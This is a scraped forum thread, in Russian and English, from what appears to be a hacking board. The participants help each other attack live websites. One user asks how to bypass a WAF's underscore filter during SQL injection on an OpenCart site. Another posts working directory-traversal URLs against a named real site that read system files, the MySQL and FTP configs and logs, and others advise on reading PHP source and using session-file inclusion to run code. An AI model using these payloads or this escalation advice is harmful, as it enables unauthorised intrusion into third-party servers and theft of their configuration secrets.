Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,026
    Likes Received:
    1,409
    Reputations:
    53
    100500 waf
     
  2. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
    and, what can do in this situation ?
     
  3. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,183
    Likes Received:
    9,497
    Reputations:
    110
    Try boolean-based via more than 1 row )
     
  4. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
    sorry, but there waf blocks _ symbol, don't know how to bypass
    ++
    default opencart tables have _ symbol (
     
  5. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
  6. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
    @Sensoft thanks but i want to dump table, column names, and there waf blocks _ symbol, don't know how to bypass

    default opencart tables have _ symbol
     
  7. MotherHacker

    MotherHacker New Member

    Joined:
    14 Oct 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
  8. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
    @MotherHacker i saw that, there are _ symbol is in column name, but in my situation in table name
    i also tested %5F, but no result
     
  9. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
    sorry, can anyone advice-help to bypass _ (underline) symbol waf filter in sql injection ?
    thanks
     
  10. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.

    Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
    Code:
    https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
    Что нашел:
    - конфиг мускула
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
    - конфиг фтп
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
    - логи фтп (не нашел подключения)
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
    Что не могу найти:
    - логи апача
    - способ залиться
     
  11. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    чёт не фурычит сайт )
     
  12. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    С СНГ IP может не пускать.

    Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
     
  13. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    504
    Likes Received:
    903
    Reputations:
    317
    Ниразу не LFI, это читалка. На чтение логов нет прав.
     
    z3u5 and ms13 like this.
  14. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.
    Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
     
  15. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,183
    Likes Received:
    9,497
    Reputations:
    110
    код должен выполняться?
     
    z3u5 likes this.
  16. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?
    Я не в теме, пишу без наездов, вам все кажется.
     
  17. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    504
    Likes Received:
    903
    Reputations:
    317
    С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

    Code:
    Content-Disposition: inline; filename=""
    Content-Length: 0
    Connection: close
    Content-Type: image/jpeg
    
    Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

    Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
     
    z3u5 likes this.
  18. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    504
    Likes Received:
    903
    Reputations:
    317
    Либо прочитать любой PHP скрипт :D

    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../index.php
    
     
    z3u5 likes this.
  19. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?
     
  20. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,026
    Likes Received:
    1,409
    Reputations:
    53
    Для этого
    1) должен быть инклуд
    2) не должно быть расширение(или его можно откинуть)
    3) должен знать имя своего сеансового файла
    site.ru/?page=../../../../../../var/log/sess_file
    ____________________________________________________________________________
     
    z3u5 and crlf like this.
Loading...